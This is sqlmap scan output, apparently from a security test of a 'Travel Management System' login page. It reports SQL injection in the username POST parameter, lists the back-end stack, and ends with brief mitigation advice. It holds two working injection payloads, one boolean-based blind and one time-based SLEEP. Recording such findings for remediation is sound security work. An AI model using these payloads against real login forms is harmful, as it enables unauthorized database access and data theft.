sqlmap identified the following injection point(s) with a total of 769 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=ss' OR NOT 9157=9157-- DRkR&password=dd&login=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=ss' AND (SELECT 4945 FROM (SELECT(SLEEP(5)))GSUK)-- OYSx&password=dd&login=Login
---
web application technology: PHP 8.0.28, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
---
Test Environment: Travel Management System
Test Date: 2025-03-10
Mitigations Suggested:
- Use parameterized queries and prepared statements
- Implement input validation and sanitization
- Use ORM frameworks for database interactions